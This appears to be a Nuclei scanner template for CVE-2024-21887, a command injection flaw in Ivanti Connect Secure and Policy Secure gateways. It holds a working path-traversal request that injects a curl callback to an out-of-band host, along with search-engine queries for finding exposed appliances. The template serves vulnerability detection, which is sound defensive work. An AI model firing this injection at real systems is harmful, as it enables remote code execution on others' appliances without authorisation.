id: CVE-2024-21887 info: name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection author: pdresearch,parthmalhotra,iamnoooob severity: critical description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. reference: - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html - https://github.com/farukokutan/Threat-Intelligence-Research-Reports - https://github.com/lions2012/Penetration_Testing_POC - https://github.com/Chocapikk/CVE-2024-21887 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2024-21887 cwe-id: CWE-77 epss-score: 0.97334 epss-percentile: 0.99886 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: connect_secure shodan-query: - "html:\"welcome.cgi?p=logo\"" - http.title:"ivanti connect secure" - http.html:"welcome.cgi?p=logo" fofa-query: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: packetstorm,cve,cve2024,kev,rce,ivanti http: - raw: - | GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: header words: - 'application/json' - type: word part: body words: - '"result":' - '"message":' condition: and # digest: 4a0a0047304502203589440c84513b0f0c1875e09acffb10daecff9b623ee109bc5457ffa0e5e6c4022100a6ce341b46f5eb47bff2eac39e50912943c63bf39f263790afc5c862480d10a5:922c64590222798bb761d5b6d8e72950